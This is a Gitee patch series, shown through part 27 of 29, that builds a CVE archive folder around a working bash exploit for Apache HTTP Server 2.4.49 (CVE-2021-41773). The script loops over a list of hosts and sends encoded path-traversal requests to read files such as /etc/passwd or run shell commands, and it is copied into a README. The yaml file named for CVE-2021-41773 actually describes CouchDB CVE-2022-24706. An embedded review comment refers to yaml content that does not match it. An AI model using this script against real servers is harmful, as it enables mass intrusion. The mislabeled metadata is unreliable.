From 4213602c4235c25e5544243bbca7966c0992f7bc Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:15:01 +0000 Subject: [PATCH 01/29] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20apache-HTTP=20Server?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-HTTP Server/.keep diff --git a/cve/apache-HTTP Server/.keep b/cve/apache-HTTP Server/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 38a12e3f8c8f2abe6cbde87eeefe9cce5a30cd51 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:16:12 +0000 Subject: [PATCH 02/29] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-HTTP=20Server/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-HTTP Server/.keep diff --git a/cve/apache-HTTP Server/.keep b/cve/apache-HTTP Server/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 9e96389deecd9afbbaa0fccf68999540a4e00549 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:16:30 +0000 Subject: [PATCH 03/29] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20apache-HTTP=20Server?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-HTTP Server/.keep diff --git a/cve/apache-HTTP Server/.keep b/cve/apache-HTTP Server/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 93b3d1389d339201dc6fa4fd85c09c816adade57 Mon Sep 17 00:00:00 2001 
From: fanyunpeng Date: Wed, 15 Mar 2023 09:29:04 +0000 Subject: [PATCH 04/29] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-42013?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/CVE-2021-42013/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-HTTP Server/CVE-2021-42013/.keep diff --git a/cve/apache-HTTP Server/CVE-2021-42013/.keep b/cve/apache-HTTP Server/CVE-2021-42013/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 6f4187bc305d4417e1019018ed2fc79427d7816a Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:29:56 +0000 Subject: [PATCH 05/29] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202021?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-HTTP Server/2021/.keep diff --git a/cve/apache-HTTP Server/2021/.keep b/cve/apache-HTTP Server/2021/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From ea6c8e0de35a545b12b387e5c575cb325d37d044 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:30:06 +0000 Subject: [PATCH 06/29] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-HTTP=20Server/CVE-2021-42013?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/CVE-2021-42013/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-HTTP Server/CVE-2021-42013/.keep diff --git a/cve/apache-HTTP Server/CVE-2021-42013/.keep b/cve/apache-HTTP Server/CVE-2021-42013/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 2ae05ea337a87b5ea52b4b3acd04882bab8989dd Mon Sep 17 00:00:00 2001 
From: fanyunpeng Date: Wed, 15 Mar 2023 09:30:13 +0000 Subject: [PATCH 07/29] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-42013?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/2021/CVE-2021-42013/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-HTTP Server/2021/CVE-2021-42013/.keep diff --git a/cve/apache-HTTP Server/2021/CVE-2021-42013/.keep b/cve/apache-HTTP Server/2021/CVE-2021-42013/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 435232ab39ea7a2083ffdcdb0a1ab9923f646437 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:30:44 +0000 Subject: [PATCH 08/29] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/2021/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-HTTP Server/2021/yaml/.keep diff --git a/cve/apache-HTTP Server/2021/yaml/.keep b/cve/apache-HTTP Server/2021/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From afc9907669e68e28463c514d67cf54c04ada7fec Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:30:58 +0000 Subject: [PATCH 09/29] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-HTTP=20Server/2021/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-HTTP Server/2021/.keep diff --git a/cve/apache-HTTP Server/2021/.keep b/cve/apache-HTTP Server/2021/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 4e9c383a414dbcdd3e79619a20a2e477a8908bae Mon Sep 17 00:00:00 2001 
From: fanyunpeng Date: Wed, 15 Mar 2023 09:31:09 +0000 Subject: [PATCH 10/29] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-HTTP=20Server/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-HTTP Server/.keep diff --git a/cve/apache-HTTP Server/.keep b/cve/apache-HTTP Server/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From cd532a6f0aaff97b77241eb8ed3dae27f2642f06 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:26:56 +0000 Subject: [PATCH 11/29] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-HTTP=20Server/2021/CVE-2021-42013/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/2021/CVE-2021-42013/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-HTTP Server/2021/CVE-2021-42013/.keep diff --git a/cve/apache-HTTP Server/2021/CVE-2021-42013/.keep b/cve/apache-HTTP Server/2021/CVE-2021-42013/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 3fcc712be0c8f4454bcdfd3408402617478f97a7 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:34:15 +0000 Subject: [PATCH 12/29] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-41773?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/2021/CVE-2021-41773/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-HTTP Server/2021/CVE-2021-41773/.keep diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/.keep b/cve/apache-HTTP Server/2021/CVE-2021-41773/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 3f2c2f39c9cd387af1944663a58b9d98b93a979c Mon Sep 17 00:00:00 2001 
From: fanyunpeng
Date: Thu, 16 Mar 2023 06:35:48 +0000
Subject: [PATCH 13/29] poc
Signed-off-by: fanyunpeng
---
 .../2021/CVE-2021-41773/CVE-2021-41773.sh | 22 +++++++++++++++++++
 1 file changed, 22 insertions(+)
 create mode 100644 cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh
diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh b/cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh
new file mode 100644
index 00000000..2546e270
--- /dev/null
+++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh
@@ -0,0 +1,22 @@
+# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
+# Date: 10/05/2021
+# Exploit Author: Lucas Souza https://lsass.io
+# Vendor Homepage: https://apache.org/
+# Version: 2.4.49
+# Tested on: 2.4.49
+# CVE : CVE-2021-41773
+# Credits: Ash Daulton and the cPanel Security Team
+
+#!/bin/bash
+
+if [[ $1 == '' ]]; [[ $2 == '' ]]; then
+echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
+echo ./PoC.sh targets.txt /etc/passwd
+exit
+fi
+for host in $(cat $1); do
+echo $host
+curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
+
+# PoC.sh targets.txt /etc/passwd
+# PoC.sh targets.txt /bin/sh whoami
\ No newline at end of file
-- Gitee
From fe88a3d57229cc98a8333aa73376bf2ce569bf56 Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 06:35:55 +0000
Subject: [PATCH 14/29] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?=
 =?UTF-8?q?e/apache-HTTP=20Server/2021/CVE-2021-41773/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/apache-HTTP Server/2021/CVE-2021-41773/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/apache-HTTP Server/2021/CVE-2021-41773/.keep
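Review bot: In the new CVE-2021-41773.sh the `#!/bin/bash` line is the tenth line, after the comment header, so it is only a comment and the script runs under whichever shell the caller invokes it with; under a plain `sh` the `[[ … ]]` tests are not available and the argument check fails outright. That check is also wrong on its own terms: `if [[ $1 == '' ]]; [[ $2 == '' ]]; then` discards the first test and only reacts to `$2`, so an empty target list still reaches `cat $1`; the intended guard is `if [[ -z $1 || -z $2 ]]; then` followed by `exit 1` rather than a bare `exit`, and the usage text misspells `TAGET-LIST.TXT`. The same blob 2546e270 is committed again as README.md in patch 15, so one of the two copies should go. The header documents only the affected version; for an advisory record it should also state the precondition the yaml in patch 27 spells out (CGI/cgid enabled for the execution case) and the vendor release that corrects the issue, so a reader can tell an affected host from a patched one.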
diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/.keep b/cve/apache-HTTP Server/2021/CVE-2021-41773/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From f2e5ac77cef8389ee1e99d8297f7b4b78ec39488 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:38:18 +0000 Subject: [PATCH 15/29] add cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- .../2021/CVE-2021-41773/README.md | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 cve/apache-HTTP Server/2021/CVE-2021-41773/README.md diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md new file mode 100644 index 00000000..2546e270 --- /dev/null +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -0,0 +1,22 @@ +# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) +# Date: 10/05/2021 +# Exploit Author: Lucas Souza https://lsass.io +# Vendor Homepage: https://apache.org/ +# Version: 2.4.49 +# Tested on: 2.4.49 +# CVE : CVE-2021-41773 +# Credits: Ash Daulton and the cPanel Security Team + +#!/bin/bash + +if [[ $1 == '' ]]; [[ $2 == '' ]]; then +echo Set [TAGET-LIST.TXT] [PATH] [COMMAND] +echo ./PoC.sh targets.txt /etc/passwd +exit +fi +for host in $(cat $1); do +echo $host +curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done + +# PoC.sh targets.txt /etc/passwd +# PoC.sh targets.txt /bin/sh whoami \ No newline at end of file -- Gitee From 2688f7daaa0e7847d2430e01e3ece5bb9cdc50fd Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:39:49 +0000 Subject: [PATCH 16/29] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- .../2021/CVE-2021-41773/README.md | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) 
diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index 2546e270..982a529a 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -1,11 +1,11 @@ -# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) -# Date: 10/05/2021 -# Exploit Author: Lucas Souza https://lsass.io -# Vendor Homepage: https://apache.org/ -# Version: 2.4.49 -# Tested on: 2.4.49 -# CVE : CVE-2021-41773 -# Credits: Ash Daulton and the cPanel Security Team +Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) +Date: 10/05/2021 +Exploit Author: Lucas Souza https://lsass.io +Vendor Homepage: https://apache.org/ +Version: 2.4.49 +Tested on: 2.4.49 +CVE : CVE-2021-41773 +Credits: Ash Daulton and the cPanel Security Team #!/bin/bash -- Gitee From 1dba8a2213f149666fe292d079ccd0798b67ac7c Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:40:35 +0000 Subject: [PATCH 17/29] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- .../2021/CVE-2021-41773/README.md | 27 ++++++++++++++++++- 1 file changed, 26 insertions(+), 1 deletion(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index 982a529a..0deb5b5f 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md 
@@ -19,4 +19,29 @@ echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done # PoC.sh targets.txt /etc/passwd -# PoC.sh targets.txt /bin/sh whoami \ No newline at end of file +# PoC.sh targets.txt /bin/sh whoami +Date: 2022-01-21 + +Exploit Author: Konstantin Burov, @_sadshade + +Software Link: https://couchdb.apache.org/ + +Version: 3.2.1 and below + +Tested on: Kali 2021.2 + +Based on 1F98D's Erlang Cookie - Remote Code Execution + +Shodan: port:4369 "name couchdb at" + +CVE: CVE-2022-24706 + +References: + +https://habr.com/ru/post/661195/ + +https://www.exploit-db.com/exploits/49418 + +https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ + +https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce \ No newline at end of file -- Gitee From 88593c465903ceb74accaf90aceaf3923b4fbdf1 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:41:16 +0000 Subject: [PATCH 18/29] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- .../2021/CVE-2021-41773/README.md | 29 ++----------------- 1 file changed, 3 insertions(+), 26 deletions(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index 0deb5b5f..20e956c4 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md 
@@ -17,31 +17,8 @@ fi for host in $(cat $1); do echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done +#Usage +PoC.sh targets.txt /etc/passwd +PoC.sh targets.txt /bin/sh whoami -# PoC.sh targets.txt /etc/passwd -# PoC.sh targets.txt /bin/sh whoami -Date: 2022-01-21 -Exploit Author: Konstantin Burov, @_sadshade - -Software Link: https://couchdb.apache.org/ - -Version: 3.2.1 and below - -Tested on: Kali 2021.2 - -Based on 1F98D's Erlang Cookie - Remote Code Execution - -Shodan: port:4369 "name couchdb at" - -CVE: CVE-2022-24706 - -References: - -https://habr.com/ru/post/661195/ - -https://www.exploit-db.com/exploits/49418 - -https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ - -https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce \ No newline at end of file -- Gitee From 4e36553d895c87fc7925380c3a29c3fce9ac8570 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:43:22 +0000 Subject: [PATCH 19/29] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index 20e956c4..40f62d2a 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -1,3 +1,4 @@ +#Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) Date: 10/05/2021 Exploit Author: Lucas Souza https://lsass.io -- Gitee From 9576c0b5b9f20ac30897af7d072c684b19d357d3 Mon Sep 17 00:00:00 2001 
From: fanyunpeng Date: Thu, 16 Mar 2023 06:44:34 +0000 Subject: [PATCH 20/29] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- .../2021/CVE-2021-41773/README.md | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index 40f62d2a..76e6e842 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -1,12 +1,12 @@ -#Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) -Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) -Date: 10/05/2021 -Exploit Author: Lucas Souza https://lsass.io -Vendor Homepage: https://apache.org/ -Version: 2.4.49 -Tested on: 2.4.49 -CVE : CVE-2021-41773 -Credits: Ash Daulton and the cPanel Security Team +#Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) +Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) +Date: 10/05/2021 +Exploit Author: Lucas Souza https://lsass.io +Vendor Homepage: https://apache.org/ +Version: 2.4.49 +Tested on: 2.4.49 +CVE : CVE-2021-41773 +Credits: Ash Daulton and the cPanel Security Team #!/bin/bash -- Gitee From 69b37a7afa77aaa8a228182447709bc94159552d Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:45:17 +0000 Subject: [PATCH 21/29] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index 76e6e842..a66265ee 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md 
@@ -1,4 +1,4 @@ -#Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) +# Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) Date: 10/05/2021 Exploit Author: Lucas Souza https://lsass.io -- Gitee From aae94fd447055ac924d313724da6a93a5ee46642 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:47:10 +0000 Subject: [PATCH 22/29] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index a66265ee..f3ec5ea1 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -7,7 +7,7 @@ Version: 2.4.49 Tested on: 2.4.49 CVE : CVE-2021-41773 Credits: Ash Daulton and the cPanel Security Team - +`` #!/bin/bash if [[ $1 == '' ]]; [[ $2 == '' ]]; then @@ -18,6 +18,7 @@ fi for host in $(cat $1); do echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done +`` #Usage PoC.sh targets.txt /etc/passwd PoC.sh targets.txt /bin/sh whoami -- Gitee From 2ee7f970e46a45ec383b173ffa489e4c63bf7d70 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:47:31 +0000 Subject: [PATCH 23/29] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index f3ec5ea1..b4f2d065 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md 
+++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -19,7 +19,7 @@ for host in $(cat $1); do echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done `` -#Usage +# Usage PoC.sh targets.txt /etc/passwd PoC.sh targets.txt /bin/sh whoami -- Gitee From 842efb59a95b833e389d0a85f5ccadabe175ab94 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:48:49 +0000 Subject: [PATCH 24/29] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index b4f2d065..a60daadb 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -7,7 +7,7 @@ Version: 2.4.49 Tested on: 2.4.49 CVE : CVE-2021-41773 Credits: Ash Daulton and the cPanel Security Team -`` +``` #!/bin/bash if [[ $1 == '' ]]; [[ $2 == '' ]]; then @@ -18,7 +18,7 @@ fi for host in $(cat $1); do echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done -`` +``` # Usage PoC.sh targets.txt /etc/passwd PoC.sh targets.txt /bin/sh whoami -- Gitee From 5cd7861bf43b7ad30133f10e64dbe0f76affcd93 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:49:51 +0000 Subject: [PATCH 25/29] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index a60daadb..d4d61313 100644 
--- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -20,7 +20,8 @@ echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done ``` # Usage -PoC.sh targets.txt /etc/passwd -PoC.sh targets.txt /bin/sh whoami - +``` +PoC.sh targets.txt /etc/passwd +PoC.sh targets.txt /bin/sh whoami +``` -- Gitee From 10b19121b5b8a09237a43aedc03f8be872cdb6ac Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:52:38 +0000 Subject: [PATCH 26/29] add cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml. Signed-off-by: fanyunpeng --- .../2021/yaml/CVE-2021-41773.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml diff --git a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml new file mode 100644 index 00000000..50fd5093 --- /dev/null +++ b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml 
@@ -0,0 +1,32 @@
+id: CVE-2022-24706
+source: https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit
+info:
+ name: Apache CouchDB 是一个面向文档的数据库管理系统。
+ severity: critical
+ description:
+ 当CouchDB 以集群模式安装时,会开启epmd服务,并且监听相应端口。由于在默认安装过程中Apache CouchDB 将 Erlang Cookie默认设置为 monster,若未经修改,则攻击者可利用该cookie连接epmd,在知道fqdn的情况下执行任意代码,控制服务器。
+ scope-of-influence:
+ apache-CouchDB < 3.2.2
+ reference:
+ - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-...
+ - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code...
+ - http://www.openwall.com/lists/oss-security/2022/04/26/1
+ - http://www.openwall.com/lists/oss-security/2022/05/09/1
+ - http://www.openwall.com/lists/oss-security/2022/05/09/2
+ - http://www.openwall.com/lists/oss-security/2022/05/09/3
+ - http://www.openwall.com/lists/oss-security/2022/05/09/4
+ - https://docs.couchdb.org/en/3.2.2/setup/cluster.html
+ - https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00
+ - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti...
+ - https://www.openwall.com/lists/oss-security/2022/04/26/1
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-24706
+ cwe-id: CWE-1188
+ cnvd-id: None
+ kve-id: None
+ tags:
+ - 不安全的默认资源初始化
+ - 弱口令要求
+ - 远程代码执行
\ No newline at end of file
-- Gitee
From 0224658f029cfceb7331377e7549cf89975adec2 Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 06:56:12 +0000
Subject: [PATCH 27/29] update cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml.
Signed-off-by: fanyunpeng
---
